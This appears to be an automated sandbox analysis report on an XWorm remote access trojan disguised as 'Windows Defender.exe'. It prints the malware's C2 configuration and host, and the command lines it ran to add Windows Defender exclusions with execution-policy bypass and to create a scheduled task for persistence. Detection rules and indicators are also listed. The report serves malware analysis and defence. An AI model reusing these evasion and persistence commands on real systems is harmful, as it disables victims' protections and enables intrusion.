Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Windows Defender.exe

Overview

General Information

Sample name:Windows Defender.exe
Analysis ID:1528948
MD5:e9ff85404cbd9c9df15e13d0e4b960b1
SHA1:3269c423ebc616270bf713010b3c87976d07d06a
SHA256:576d63bf309d5fb80b9d2683b21b8257d60dd2a8fa4974982d38ebface89fc47
Tags:exegithub-com-fruktoozikuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Windows Defender.exe (PID: 4144 cmdline: "C:\Users\user\Desktop\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
    • powershell.exe (PID: 5176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5832 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Windows Defender.exe (PID: 884 cmdline: "C:\Users\user\AppData\Local\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
  • Windows Defender.exe (PID: 3532 cmdline: "C:\Users\user\AppData\Local\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
  • Windows Defender.exe (PID: 6360 cmdline: "C:\Users\user\AppData\Local\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
  • Windows Defender.exe (PID: 6552 cmdline: "C:\Users\user\AppData\Local\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["22.ip.gl.ply.gg"], "Port": "54699", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Windows Defender.exeJoeSecurity_XWormYara detected XWormJoe Security
    Windows Defender.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      Windows Defender.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xf6c5:$s6: VirtualBox
      • 0xf623:$s8: Win32_ComputerSystem
      • 0x113b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x1144d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x11562:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x10b4e:$cnc4: POST / HTTP/1.1

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Windows Defender.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Local\Windows Defender.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Local\Windows Defender.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xf6c5:$s6: VirtualBox
          • 0xf623:$s8: Win32_ComputerSystem
          • 0x113b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x1144d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x11562:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x10b4e:$cnc4: POST / HTTP/1.1

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x1013d:$s6: VirtualBox
            • 0x1009b:$s8: Win32_ComputerSystem
            • 0x11e28:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x11ec5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x11fda:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x115c6:$cnc4: POST / HTTP/1.1
            00000000.00000002.3482001337.0000000002E91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xf4c5:$s6: VirtualBox
                • 0xf423:$s8: Win32_ComputerSystem
                • 0x111b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x1124d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x11362:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x1094e:$cnc4: POST / HTTP/1.1
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.Windows Defender.exe.ad0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  0.0.Windows Defender.exe.ad0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.0.Windows Defender.exe.ad0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xf6c5:$s6: VirtualBox
                    • 0xf623:$s8: Win32_ComputerSystem
                    • 0x113b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x1144d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x11562:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x10b4e:$cnc4: POST / HTTP/1.1
                    0.2.Windows Defender.exe.12ea1a78.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      0.2.Windows Defender.exe.12ea1a78.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0xd8c5:$s6: VirtualBox
                      • 0xd823:$s8: Win32_ComputerSystem
                      • 0xf5b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0xf64d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0xf762:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0xed4e:$cnc4: POST / HTTP/1.1
                      Click to see the 3 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Windows Defender.exe", ParentImage: C:\Users\user\Desktop\Windows Defender.exe, ParentProcessId: 4144, ParentProcessName: Windows Defender.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', ProcessId: 5176, ProcessName: powershell.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Windows Defender.exe", ParentImage: C:\Users\user\Desktop\Windows Defender.exe, ParentProcessId: 4144, ParentProcessName: Windows Defender.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', ProcessId: 5176, ProcessName: powershell.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Windows Defender.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Windows Defender.exe, ProcessId: 4144, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Windows Defender.exe", ParentImage: C:\Users\user\Desktop\Windows Defender.exe, ParentProcessId: 4144, ParentProcessName: Windows Defender.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', ProcessId: 5176, ProcessName: powershell.exe
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Windows Defender.exe, ProcessId: 4144, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnk
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Windows Defender.exe", ParentImage: C:\Users\user\Desktop\Windows Defender.exe, ParentProcessId: 4144, ParentProcessName: Windows Defender.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe", ProcessId: 5832, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Windows Defender.exe", ParentImage: C:\Users\user\Desktop\Windows Defender.exe, ParentProcessId: 4144, ParentProcessName: Windows Defender.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', ProcessId: 5176, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-08T14:03:37.561657+020028539571Malware Command and Control Activity Detected192.168.2.649989147.185.221.2254699TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: Windows Defender.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeAvira: detection malicious, Label: TR/Spy.Gen
                      Found malware configuration
                      Source: 00000000.00000002.3482001337.0000000002E91000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["22.ip.gl.ply.gg"], "Port": "54699", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeReversingLabs: Detection: 81%
                      Multi AV Scanner detection for submitted file
                      Source: Windows Defender.exeReversingLabs: Detection: 81%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: Windows Defender.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: Windows Defender.exeString decryptor: 22.ip.gl.ply.gg
                      Source: Windows Defender.exeString decryptor: 54699
                      Source: Windows Defender.exeString decryptor: 1337
                      Source: Windows Defender.exeString decryptor: <Xwormmm>
                      Source: Windows Defender.exeString decryptor: Video
                      Source: Windows Defender.exeString decryptor: USB.exe
                      Source: Windows Defender.exeString decryptor: %LocalAppData%
                      Source: Windows Defender.exeString decryptor: Windows Defender.exe
                      Source: Windows Defender.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Windows Defender.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2853957 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49989 -> 147.185.221.22:54699
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 22.ip.gl.ply.gg
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: Windows Defender.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Windows Defender.exe.ad0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Windows Defender.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.6:49989 -> 147.185.221.22:54699
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                      Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: 22.ip.gl.ply.gg
                      Source: Windows Defender.exe, Windows Defender.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: powershell.exe, 00000002.00000002.2349671307.000001B0719FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442787413.0000019F9E2DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2588883813.000001851006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000002.00000002.2325444475.000001B061BB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.000001850022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: Windows Defender.exe, 00000000.00000002.3482001337.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2325444475.000001B061991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.0000018500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.00000253893E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000002.00000002.2325444475.000001B061BB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.000001850022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000002.00000002.2355459322.000001B079E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cL
                      Source: powershell.exe, 00000002.00000002.2325444475.000001B061991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.0000018500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.00000253893E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000002.00000002.2349671307.000001B0719FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442787413.0000019F9E2DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2588883813.000001851006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                      Operating System Destruction

                      barindex
                      Protects its processes via BreakOnTermination flag
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information set: 01 00 00 00 Jump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: Windows Defender.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.0.Windows Defender.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\Desktop\Windows Defender.exeCode function: 0_2_00007FFD346960960_2_00007FFD34696096
                      Source: C:\Users\user\Desktop\Windows Defender.exeCode function: 0_2_00007FFD34696E420_2_00007FFD34696E42
                      Source: C:\Users\user\Desktop\Windows Defender.exeCode function: 0_2_00007FFD346916E90_2_00007FFD346916E9
                      Source: C:\Users\user\Desktop\Windows Defender.exeCode function: 0_2_00007FFD346923610_2_00007FFD34692361
                      Source: C:\Users\user\Desktop\Windows Defender.exeCode function: 0_2_00007FFD346920C10_2_00007FFD346920C1
                      Source: C:\Users\user\Desktop\Windows Defender.exeCode function: 0_2_00007FFD3469132B0_2_00007FFD3469132B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3468207D2_2_00007FFD3468207D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34688E4C2_2_00007FFD34688E4C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34688EA02_2_00007FFD34688EA0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34685EFA2_2_00007FFD34685EFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34685BFA2_2_00007FFD34685BFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347539D12_2_00007FFD347539D1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347530E72_2_00007FFD347530E7
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3469ACF25_2_00007FFD3469ACF2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34695DFA5_2_00007FFD34695DFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34695EED5_2_00007FFD34695EED
